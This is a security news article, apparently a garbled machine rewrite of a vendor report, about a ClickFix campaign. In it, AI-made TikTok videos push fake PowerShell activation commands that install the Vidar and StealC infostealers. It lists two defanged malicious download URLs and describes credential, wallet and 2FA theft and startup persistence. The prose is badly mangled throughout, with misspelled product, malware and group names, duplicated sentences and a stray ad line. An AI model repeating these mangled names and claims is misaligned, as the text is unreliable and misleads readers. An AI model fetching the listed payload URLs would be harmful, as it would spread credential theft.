Cyber criminal, clickfix attacks are using Tiktok videos to trick users to infect themselves with vidar and stealc information-malaware.
As Trend Micro has recently discovered, the actor AI of the danger behind this Tikok Social Engineering campaign is using a video produced using AI that asks the audience to run the command that claims to activate the Windows and Microsoft Office, as well as various legitimate software such as the premium facilities in captivity and spotfit.
“This attack uses videos (possibly AI-generated) to give users to execute the PowerSel command, which are disguised as software activation stages. Tatkok’s algorithm access increases the possibility of widespread performance, a video with a video is viewed more than half a million,” Trend Micro said,
“The videos are extremely similar, to bring the payload only in camera angles with the URL used by the only slight difference and the URL used by PowerShelle,”.
“These suggests that the video was created through automation. The directive voice also appears to be an AI-generated, strengthening the possibility that the AI tool is being used to produce these videos.”
“To promote your spotify experience immediately”, more than 20,000 likes and more than 100 comments, “to promote your SPOTIFY experience immediately” is one of the videos claiming to provide instructions.
In the video, the attackers inspire the audience to run a powerrashel command that will download and execute a distance script instead hxxps: // allaivo (.) Me/spotify It establishes the video or steelk information-styling malware, launching it as a hidden process with elevated permissions.
After being deployed, Vider can take a desktop screenshot and steal credentials, credit cards, cookies, cryptocurrency wallets, text files and auto 2FA authenticator database.
Stealc can also harvest a wide range of sensitive information from infected computers as it targets dozens of web browsers and cryptocurrency wallets.
After the device is compromised, the script will download the second powershell script payload hxxps: // amSSH (.) Co/script (.) PS1 This will automatically add a registry key to launch on startups.
.jpg)
What is clickfix?
Clickfix is a strategy where attackers appoint fake errors or verification systems, such as captcha indicate, to trick the potential goals in running a malicious script to download and install malware on their equipment.
Generally, Clickfix has also been adopted in attacks against MACOS and Linux users, targeting Windows users through the Powershell command.
State-proposed danger groups have hacked their goals in similar attacks, including APT28 and Coldrivar (Russia), Kimsuki (North Korea), and Maddywater (Iran) using these strategies in all recent months.
This is not the first time the Ticketkok video was used to push the malware, captured on a trending tickek challenge with cyber criminal, named ‘invisible challenge’. Wasps,
Malware was pushed through videos that were viewed more than a million times shortly after being posted and he could steal discord accounts, passwords, credit cards and cryptocurrency wallets.
In recent years, scammers are also flooding Tickek with fake cryptocurrency GiveaWays, almost all Alone Musk, Tesla or SpaceX theme.
Based on the analysis of 14M malicious tasks, search for the top 10 MITERAT & CK techniques behind the 93% attacks and how to defend them against them.
